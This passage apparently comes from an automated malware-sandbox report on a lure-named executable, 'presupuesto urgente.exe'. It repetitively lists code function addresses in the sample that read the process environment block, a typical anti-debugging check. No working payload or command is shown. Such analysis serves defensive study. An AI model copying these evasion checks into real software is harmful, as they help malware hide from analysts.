        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AD250 mov ecx, dword ptr fs:[00000030h]2_2_335AD250
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F124C mov eax, dword ptr fs:[00000030h]2_2_335F124C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F124C mov eax, dword ptr fs:[00000030h]2_2_335F124C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F124C mov eax, dword ptr fs:[00000030h]2_2_335F124C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F124C mov eax, dword ptr fs:[00000030h]2_2_335F124C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF247 mov eax, dword ptr fs:[00000030h]2_2_335EF247
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355F24A mov eax, dword ptr fs:[00000030h]2_2_3355F24A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B273 mov eax, dword ptr fs:[00000030h]2_2_3352B273
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B273 mov eax, dword ptr fs:[00000030h]2_2_3352B273
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B273 mov eax, dword ptr fs:[00000030h]2_2_3352B273
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C327E mov eax, dword ptr fs:[00000030h]2_2_335C327E
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C327E mov eax, dword ptr fs:[00000030h]2_2_335C327E
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C327E mov eax, dword ptr fs:[00000030h]2_2_335C327E
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C327E mov eax, dword ptr fs:[00000030h]2_2_335C327E
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C327E mov eax, dword ptr fs:[00000030h]2_2_335C327E
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C327E mov eax, dword ptr fs:[00000030h]2_2_335C327E
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335ED270 mov eax, dword ptr fs:[00000030h]2_2_335ED270
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352821B mov eax, dword ptr fs:[00000030h]2_2_3352821B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335BB214 mov eax, dword ptr fs:[00000030h]2_2_335BB214
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335BB214 mov eax, dword ptr fs:[00000030h]2_2_335BB214
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352A200 mov eax, dword ptr fs:[00000030h]2_2_3352A200
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33550230 mov ecx, dword ptr fs:[00000030h]2_2_33550230
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B0227 mov eax, dword ptr fs:[00000030h]2_2_335B0227
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B0227 mov eax, dword ptr fs:[00000030h]2_2_335B0227
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B0227 mov eax, dword ptr fs:[00000030h]2_2_335B0227
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356A22B mov eax, dword ptr fs:[00000030h]2_2_3356A22B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356A22B mov eax, dword ptr fs:[00000030h]2_2_3356A22B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356A22B mov eax, dword ptr fs:[00000030h]2_2_3356A22B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335532C5 mov eax, dword ptr fs:[00000030h]2_2_335532C5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_336032C9 mov eax, dword ptr fs:[00000030h]2_2_336032C9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335402F9 mov eax, dword ptr fs:[00000030h]2_2_335402F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335402F9 mov eax, dword ptr fs:[00000030h]2_2_335402F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335402F9 mov eax, dword ptr fs:[00000030h]2_2_335402F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335402F9 mov eax, dword ptr fs:[00000030h]2_2_335402F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335402F9 mov eax, dword ptr fs:[00000030h]2_2_335402F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335402F9 mov eax, dword ptr fs:[00000030h]2_2_335402F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335402F9 mov eax, dword ptr fs:[00000030h]2_2_335402F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335402F9 mov eax, dword ptr fs:[00000030h]2_2_335402F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335272E0 mov eax, dword ptr fs:[00000030h]2_2_335272E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353A2E0 mov eax, dword ptr fs:[00000030h]2_2_3353A2E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353A2E0 mov eax, dword ptr fs:[00000030h]2_2_3353A2E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353A2E0 mov eax, dword ptr fs:[00000030h]2_2_3353A2E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353A2E0 mov eax, dword ptr fs:[00000030h]2_2_3353A2E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353A2E0 mov eax, dword ptr fs:[00000030h]2_2_3353A2E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353A2E0 mov eax, dword ptr fs:[00000030h]2_2_3353A2E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335382E0 mov eax, dword ptr fs:[00000030h]2_2_335382E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335382E0 mov eax, dword ptr fs:[00000030h]2_2_335382E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335382E0 mov eax, dword ptr fs:[00000030h]2_2_335382E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335382E0 mov eax, dword ptr fs:[00000030h]2_2_335382E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352D2EC mov eax, dword ptr fs:[00000030h]2_2_3352D2EC
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352D2EC mov eax, dword ptr fs:[00000030h]2_2_3352D2EC
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33537290 mov eax, dword ptr fs:[00000030h]2_2_33537290
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33537290 mov eax, dword ptr fs:[00000030h]2_2_33537290
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33537290 mov eax, dword ptr fs:[00000030h]2_2_33537290
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE289 mov eax, dword ptr fs:[00000030h]2_2_335AE289
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360B2BC mov eax, dword ptr fs:[00000030h]2_2_3360B2BC
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360B2BC mov eax, dword ptr fs:[00000030h]2_2_3360B2BC
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360B2BC mov eax, dword ptr fs:[00000030h]2_2_3360B2BC
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360B2BC mov eax, dword ptr fs:[00000030h]2_2_3360B2BC
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352C2B0 mov ecx, dword ptr fs:[00000030h]2_2_3352C2B0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF2AE mov eax, dword ptr fs:[00000030h]2_2_335EF2AE
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F92AB mov eax, dword ptr fs:[00000030h]2_2_335F92AB
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335542AF mov eax, dword ptr fs:[00000030h]2_2_335542AF
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335542AF mov eax, dword ptr fs:[00000030h]2_2_335542AF
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335292AF mov eax, dword ptr fs:[00000030h]2_2_335292AF
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356415F mov eax, dword ptr fs:[00000030h]2_2_3356415F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352A147 mov eax, dword ptr fs:[00000030h]2_2_3352A147
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352A147 mov eax, dword ptr fs:[00000030h]2_2_3352A147
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352A147 mov eax, dword ptr fs:[00000030h]2_2_3352A147
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C314A mov eax, dword ptr fs:[00000030h]2_2_335C314A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C314A mov eax, dword ptr fs:[00000030h]2_2_335C314A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C314A mov eax, dword ptr fs:[00000030h]2_2_335C314A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C314A mov eax, dword ptr fs:[00000030h]2_2_335C314A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3358717A mov eax, dword ptr fs:[00000030h]2_2_3358717A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3358717A mov eax, dword ptr fs:[00000030h]2_2_3358717A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33605149 mov eax, dword ptr fs:[00000030h]2_2_33605149
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33536179 mov eax, dword ptr fs:[00000030h]2_2_33536179
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33603157 mov eax, dword ptr fs:[00000030h]2_2_33603157
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33603157 mov eax, dword ptr fs:[00000030h]2_2_33603157
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33603157 mov eax, dword ptr fs:[00000030h]2_2_33603157
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356716D mov eax, dword ptr fs:[00000030h]2_2_3356716D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F113 mov eax, dword ptr fs:[00000030h]2_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33560118 mov eax, dword ptr fs:[00000030h]2_2_33560118
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355510F mov eax, dword ptr fs:[00000030h]2_2_3355510F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353510D mov eax, dword ptr fs:[00000030h]2_2_3353510D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF13E mov eax, dword ptr fs:[00000030h]2_2_335EF13E
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335BA130 mov eax, dword ptr fs:[00000030h]2_2_335BA130
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33567128 mov eax, dword ptr fs:[00000030h]2_2_33567128
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33567128 mov eax, dword ptr fs:[00000030h]2_2_33567128
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335401C0 mov eax, dword ptr fs:[00000030h]2_2_335401C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335401C0 mov eax, dword ptr fs:[00000030h]2_2_335401C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335451C0 mov eax, dword ptr fs:[00000030h]2_2_335451C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335451C0 mov eax, dword ptr fs:[00000030h]2_2_335451C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335451C0 mov eax, dword ptr fs:[00000030h]2_2_335451C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335451C0 mov eax, dword ptr fs:[00000030h]2_2_335451C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335291F0 mov eax, dword ptr fs:[00000030h]2_2_335291F0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335291F0 mov eax, dword ptr fs:[00000030h]2_2_335291F0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335401F1 mov eax, dword ptr fs:[00000030h]2_2_335401F1
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335401F1 mov eax, dword ptr fs:[00000030h]2_2_335401F1
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335401F1 mov eax, dword ptr fs:[00000030h]2_2_335401F1
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355F1F0 mov eax, dword ptr fs:[00000030h]2_2_3355F1F0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355F1F0 mov eax, dword ptr fs:[00000030h]2_2_3355F1F0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353A1E3 mov eax, dword ptr fs:[00000030h]2_2_3353A1E3
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353A1E3 mov eax, dword ptr fs:[00000030h]2_2_3353A1E3
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353A1E3 mov eax, dword ptr fs:[00000030h]2_2_3353A1E3
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353A1E3 mov eax, dword ptr fs:[00000030h]2_2_3353A1E3
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353A1E3 mov eax, dword ptr fs:[00000030h]2_2_3353A1E3
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F81EE mov eax, dword ptr fs:[00000030h]2_2_335F81EE
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F81EE mov eax, dword ptr fs:[00000030h]2_2_335F81EE
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355B1E0 mov eax, dword ptr fs:[00000030h]2_2_3355B1E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355B1E0 mov eax, dword ptr fs:[00000030h]2_2_3355B1E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355B1E0 mov eax, dword ptr fs:[00000030h]2_2_3355B1E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355B1E0 mov eax, dword ptr fs:[00000030h]2_2_3355B1E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355B1E0 mov eax, dword ptr fs:[00000030h]2_2_3355B1E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355B1E0 mov eax, dword ptr fs:[00000030h]2_2_3355B1E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355B1E0 mov eax, dword ptr fs:[00000030h]2_2_3355B1E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335391E5 mov eax, dword ptr fs:[00000030h]2_2_335391E5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335391E5 mov eax, dword ptr fs:[00000030h]2_2_335391E5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335281EB mov eax, dword ptr fs:[00000030h]2_2_335281EB
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33559194 mov eax, dword ptr fs:[00000030h]2_2_33559194
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571190 mov eax, dword ptr fs:[00000030h]2_2_33571190
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571190 mov eax, dword ptr fs:[00000030h]2_2_33571190
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33534180 mov eax, dword ptr fs:[00000030h]2_2_33534180
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33534180 mov eax, dword ptr fs:[00000030h]2_2_33534180
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33534180 mov eax, dword ptr fs:[00000030h]2_2_33534180
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_336051B6 mov eax, dword ptr fs:[00000030h]2_2_336051B6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335631BE mov eax, dword ptr fs:[00000030h]2_2_335631BE
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335631BE mov eax, dword ptr fs:[00000030h]2_2_335631BE
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335641BB mov ecx, dword ptr fs:[00000030h]2_2_335641BB
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335641BB mov eax, dword ptr fs:[00000030h]2_2_335641BB
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335641BB mov eax, dword ptr fs:[00000030h]2_2_335641BB
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E1A4 mov eax, dword ptr fs:[00000030h]2_2_3356E1A4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E1A4 mov eax, dword ptr fs:[00000030h]2_2_3356E1A4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33531051 mov eax, dword ptr fs:[00000030h]2_2_33531051
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33531051 mov eax, dword ptr fs:[00000030h]2_2_33531051
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33560044 mov eax, dword ptr fs:[00000030h]2_2_33560044
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33537072 mov eax, dword ptr fs:[00000030h]2_2_33537072
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33536074 mov eax, dword ptr fs:[00000030h]2_2_33536074
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33536074 mov eax, dword ptr fs:[00000030h]2_2_33536074
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360505B mov eax, dword ptr fs:[00000030h]2_2_3360505B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335D9060 mov eax, dword ptr fs:[00000030h]2_2_335D9060
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572010 mov ecx, dword ptr fs:[00000030h]2_2_33572010
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33555004 mov eax, dword ptr fs:[00000030h]2_2_33555004
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33555004 mov ecx, dword ptr fs:[00000030h]2_2_33555004
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33538009 mov eax, dword ptr fs:[00000030h]2_2_33538009
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352D02D mov eax, dword ptr fs:[00000030h]2_2_3352D02D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354B0D0 mov eax, dword ptr fs:[00000030h]2_2_3354B0D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B0D6 mov eax, dword ptr fs:[00000030h]2_2_3352B0D6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B0D6 mov eax, dword ptr fs:[00000030h]2_2_3352B0D6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B0D6 mov eax, dword ptr fs:[00000030h]2_2_3352B0D6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B0D6 mov eax, dword ptr fs:[00000030h]2_2_3352B0D6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352C0F6 mov eax, dword ptr fs:[00000030h]2_2_3352C0F6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356D0F0 mov eax, dword ptr fs:[00000030h]2_2_3356D0F0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3356D0F0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335290F8 mov eax, dword ptr fs:[00000030h]2_2_335290F8
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335290F8 mov eax, dword ptr fs:[00000030h]2_2_335290F8
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335290F8 mov eax, dword ptr fs:[00000030h]2_2_335290F8
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335290F8 mov eax, dword ptr fs:[00000030h]2_2_335290F8
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352A093 mov ecx, dword ptr fs:[00000030h]2_2_3352A093
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352C090 mov eax, dword ptr fs:[00000030h]2_2_3352C090
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_336050B7 mov eax, dword ptr fs:[00000030h]2_2_336050B7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604080 mov eax, dword ptr fs:[00000030h]2_2_33604080
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EB0AF mov eax, dword ptr fs:[00000030h]2_2_335EB0AF
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335700A5 mov eax, dword ptr fs:[00000030h]2_2_335700A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF0A5 mov eax, dword ptr fs:[00000030h]2_2_335DF0A5
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov eax, dword ptr fs:[00000030h]2_2_33552755
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov eax, dword ptr fs:[00000030h]2_2_33552755
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov eax, dword ptr fs:[00000030h]2_2_33552755
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov ecx, dword ptr fs:[00000030h]2_2_33552755
